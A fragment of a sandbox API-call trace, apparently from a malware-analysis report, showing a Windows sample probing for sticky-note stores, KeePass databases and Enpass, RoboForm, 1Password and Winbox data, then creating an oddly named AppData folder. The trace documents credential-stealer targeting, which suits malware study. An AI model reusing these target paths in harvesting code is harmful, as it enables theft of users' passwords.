Flags=0x0, Size=0xc) returned 0x62b740 [0065.174] GetProcessHeap () returned 0x620000 [0065.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0065.175] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0065.175] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63a6e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0065.175] GetProcessHeap () returned 0x620000 [0065.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f60) returned 0x63cbb8 [0065.176] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.177] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\NoteFly\\notes", arglist=0x19fb54 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NoteFly\\notes") returned 51 [0065.177] GetProcessHeap () returned 0x620000 [0065.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6a) returned 0x63a8f0 [0065.177] GetProcessHeap () returned 0x620000 [0065.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.178] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.178] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NoteFly\\notes") returned 0 [0065.178] GetProcessHeap () returned 0x620000 [0065.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0065.179] GetProcessHeap () returned 0x620000 [0065.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a8f0 | out: hHeap=0x620000) returned 1 [0065.179] GetProcessHeap () returned 0x620000 [0065.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0065.180] GetProcessHeap () returned 0x620000 [0065.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b740 | out: hHeap=0x620000) returned 1 [0065.180] GetProcessHeap () returned 0x620000 [0065.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f86) returned 0x63cbb8 [0065.181] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.182] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\Conceptworld\\Notezilla\\Notes8.db", arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Conceptworld\\Notezilla\\Notes8.db") returned 70 [0065.182] GetProcessHeap () returned 0x620000 [0065.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x63a478 [0065.182] GetProcessHeap () returned 0x620000 [0065.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.183] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Conceptworld\\Notezilla\\Notes8.db") returned 0 [0065.184] GetProcessHeap () returned 0x620000 [0065.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0065.188] GetProcessHeap () returned 0x620000 [0065.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f92) returned 0x63cbb8 [0065.189] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.190] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\Microsoft\\Sticky Notes\\StickyNotes.snt", arglist=0x19fb3c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Sticky Notes\\StickyNotes.snt") returned 76 [0065.190] GetProcessHeap () returned 0x620000 [0065.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9c) returned 0x62a740 [0065.190] GetProcessHeap () returned 0x620000 [0065.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.191] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.192] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Sticky Notes\\StickyNotes.snt") returned 0 [0065.192] GetProcessHeap () returned 0x620000 [0065.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62a740 | out: hHeap=0x620000) returned 1 [0065.192] GetProcessHeap () returned 0x620000 [0065.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0065.193] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0065.194] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x63a6e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0065.194] GetProcessHeap () returned 0x620000 [0065.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f44) returned 0x63cbb8 [0065.195] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.196] wvsprintfW (in: param_1=0x63cbb8, param_2="%s", arglist=0x19fb60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 31 [0065.196] GetProcessHeap () returned 0x620000 [0065.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x42) returned 0x63b088 [0065.196] GetProcessHeap () returned 0x620000 [0065.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.198] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 1 [0065.198] GetProcessHeap () returned 0x620000 [0065.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0065.199] Sleep (dwMilliseconds=0xa) [0065.217] GetProcessHeap () returned 0x620000 [0065.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63cbb8 [0065.218] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.218] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\%s", arglist=0x19f8e0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdbx") returned 38 [0065.218] GetProcessHeap () returned 0x620000 [0065.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x63a478 [0065.218] GetProcessHeap () returned 0x620000 [0065.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.220] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdbx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.kdbx"), lpFindFileData=0x19f8f4 | out: lpFindFileData=0x19f8f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="낈cꛠc")) returned 0xffffffff [0065.220] GetProcessHeap () returned 0x620000 [0065.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0065.221] GetProcessHeap () returned 0x620000 [0065.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b088 | out: hHeap=0x620000) returned 1 [0065.221] GetProcessHeap () returned 0x620000 [0065.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0065.222] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0065.222] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x63a6e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0065.222] GetProcessHeap () returned 0x620000 [0065.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f44) returned 0x63cbb8 [0065.223] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.223] wvsprintfW (in: param_1=0x63cbb8, param_2="%s", arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 29 [0065.223] GetProcessHeap () returned 0x620000 [0065.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x634228 [0065.223] GetProcessHeap () returned 0x620000 [0065.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.224] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0065.225] GetProcessHeap () returned 0x620000 [0065.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0065.226] Sleep (dwMilliseconds=0xa) [0065.251] GetProcessHeap () returned 0x620000 [0065.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63cbb8 [0065.252] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.252] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\%s", arglist=0x19f8c8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdbx") returned 36 [0065.252] GetProcessHeap () returned 0x620000 [0065.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x63a478 [0065.253] GetProcessHeap () returned 0x620000 [0065.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.254] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdbx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.kdbx"), lpFindFileData=0x19f8dc | out: lpFindFileData=0x19f8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="䈨cꛠc")) returned 0xffffffff [0065.254] GetProcessHeap () returned 0x620000 [0065.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0065.255] GetProcessHeap () returned 0x620000 [0065.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x634228 | out: hHeap=0x620000) returned 1 [0065.255] GetProcessHeap () returned 0x620000 [0065.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0065.256] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0065.257] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x63a6e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0065.257] GetProcessHeap () returned 0x620000 [0065.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f44) returned 0x63cbb8 [0065.257] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.258] wvsprintfW (in: param_1=0x63cbb8, param_2="%s", arglist=0x19fb30 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 31 [0065.258] GetProcessHeap () returned 0x620000 [0065.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x42) returned 0x63af48 [0065.258] GetProcessHeap () returned 0x620000 [0065.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.259] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 1 [0065.260] GetProcessHeap () returned 0x620000 [0065.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0065.261] Sleep (dwMilliseconds=0xa) [0065.324] GetProcessHeap () returned 0x620000 [0065.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63cbb8 [0065.324] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.325] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\%s", arglist=0x19f8b0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdb") returned 37 [0065.325] GetProcessHeap () returned 0x620000 [0065.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4e) returned 0x63a478 [0065.325] GetProcessHeap () returned 0x620000 [0065.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.326] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdb" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.kdb"), lpFindFileData=0x19f8c4 | out: lpFindFileData=0x19f8c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="꽈cꛠc")) returned 0xffffffff [0065.326] GetProcessHeap () returned 0x620000 [0065.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0065.327] GetProcessHeap () returned 0x620000 [0065.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63af48 | out: hHeap=0x620000) returned 1 [0065.327] GetProcessHeap () returned 0x620000 [0065.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0065.328] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0065.328] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x63a6e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0065.328] GetProcessHeap () returned 0x620000 [0065.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f44) returned 0x63cbb8 [0065.329] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.329] wvsprintfW (in: param_1=0x63cbb8, param_2="%s", arglist=0x19fb60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 29 [0065.330] GetProcessHeap () returned 0x620000 [0065.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x634588 [0065.330] GetProcessHeap () returned 0x620000 [0065.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.331] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0065.331] GetProcessHeap () returned 0x620000 [0065.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0065.332] Sleep (dwMilliseconds=0xa) [0065.349] GetProcessHeap () returned 0x620000 [0065.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63cbb8 [0065.349] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.350] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\%s", arglist=0x19f8e0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdb") returned 35 [0065.350] GetProcessHeap () returned 0x620000 [0065.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4a) returned 0x63a478 [0065.350] GetProcessHeap () returned 0x620000 [0065.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.351] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdb" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.kdb"), lpFindFileData=0x19f8f4 | out: lpFindFileData=0x19f8f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="䖈cꛠc")) returned 0xffffffff [0065.351] GetProcessHeap () returned 0x620000 [0065.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0065.352] GetProcessHeap () returned 0x620000 [0065.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x634588 | out: hHeap=0x620000) returned 1 [0065.352] GetProcessHeap () returned 0x620000 [0065.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0065.353] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0065.353] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x63a6e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0065.353] GetProcessHeap () returned 0x620000 [0065.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f52) returned 0x63cbb8 [0065.354] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.354] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\Enpass", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Enpass") returned 38 [0065.354] GetProcessHeap () returned 0x620000 [0065.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x63a8f0 [0065.354] GetProcessHeap () returned 0x620000 [0065.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.356] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.356] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\Enpass") returned 0 [0065.356] GetProcessHeap () returned 0x620000 [0065.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0065.357] GetProcessHeap () returned 0x620000 [0065.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a8f0 | out: hHeap=0x620000) returned 1 [0065.357] GetProcessHeap () returned 0x620000 [0065.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0065.358] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0065.358] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x63a6e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0065.358] GetProcessHeap () returned 0x620000 [0065.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f66) returned 0x63cbb8 [0065.359] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.359] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\My RoboForm Data", arglist=0x19fb68 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My RoboForm Data") returned 48 [0065.359] GetProcessHeap () returned 0x620000 [0065.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x63a8f0 [0065.360] GetProcessHeap () returned 0x620000 [0065.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.361] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\My RoboForm Data") returned 0 [0065.361] GetProcessHeap () returned 0x620000 [0065.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a8f0 | out: hHeap=0x620000) returned 1 [0065.361] GetProcessHeap () returned 0x620000 [0065.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0065.361] GetProcessHeap () returned 0x620000 [0065.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0065.362] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0065.362] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x63a6e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0065.362] GetProcessHeap () returned 0x620000 [0065.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f58) returned 0x63cbb8 [0065.363] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.364] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\1Password", arglist=0x19fb74 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\1Password") returned 41 [0065.364] GetProcessHeap () returned 0x620000 [0065.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x56) returned 0x63a8f0 [0065.364] GetProcessHeap () returned 0x620000 [0065.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.365] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\1Password") returned 0 [0065.365] GetProcessHeap () returned 0x620000 [0065.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a8f0 | out: hHeap=0x620000) returned 1 [0065.365] GetProcessHeap () returned 0x620000 [0065.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0065.365] GetProcessHeap () returned 0x620000 [0065.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0065.366] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0065.366] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63a6e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0065.366] GetProcessHeap () returned 0x620000 [0065.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x63cbb8 [0065.367] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.367] wvsprintfW (in: param_1=0x63cbb8, param_2="Mikrotik\\Winbox", arglist=0x19fb5c | out: param_1="Mikrotik\\Winbox") returned 15 [0065.367] GetProcessHeap () returned 0x620000 [0065.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x22) returned 0x639218 [0065.367] GetProcessHeap () returned 0x620000 [0065.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.368] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.369] PathFileExistsW (pszPath="Mikrotik\\Winbox") returned 0 [0065.369] GetProcessHeap () returned 0x620000 [0065.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0065.369] GetProcessHeap () returned 0x620000 [0065.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639218 | out: hHeap=0x620000) returned 1 [0065.370] GetProcessHeap () returned 0x620000 [0065.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0065.370] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0065.370] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63a6e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0065.370] GetProcessHeap () returned 0x620000 [0065.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63cbb8 [0065.371] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.372] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\%s", arglist=0x19f994 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0065.372] GetProcessHeap () returned 0x620000 [0065.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5c) returned 0x63a8f0 [0065.372] GetProcessHeap () returned 0x620000 [0065.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.373] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0xffffffff [0065.373] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9"), lpSecurityAttributes=0x0) returned 1 [0065.374] GetProcessHeap () returned 0x620000 [0065.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f50) returned 0x63cbb8 [0065.375] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.376] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\%s.%s", arglist=0x19f9a8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb") returned 55 [0065.376] GetProcessHeap () returned 0x620000 [0065.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x72) returned 0x637520 [0065.376] GetProcessHeap () returned 0x620000 [0065.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.376] GetProcessHeap () returned 0x620000 [0065.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a8f0 | out: hHeap=0x620000) returned 1 [0065.377] GetProcessHeap () returned 0x620000 [0065.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0065.377] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.378] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x1f0000 [0065.378] GetProcessHeap () returned 0x620000 [0065.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x637520 | out: hHeap=0x620000) returned 1 [0065.378] GetProcessHeap () returned 0x620000 [0065.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1388) returned 0x63b6b0 [0065.378] GetProcessHeap () returned 0x620000 [0065.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b740 [0065.379] GetProcessHeap () returned 0x620000 [0065.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11c) returned 0x63a478 [0065.379] RtlGetVersion (in: lpVersionInformation=0x63a478 | out: lpVersionInformation=0x63a478*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0065.379] GetProcessHeap () returned 0x620000 [0065.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0065.380] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fb18 | out: lpSystemTimeAsFileTime=0x19fb18*(dwLowDateTime=0xfd19cfb8, dwHighDateTime=0x1d900af)) [0065.380] GetProcessHeap () returned 0x620000 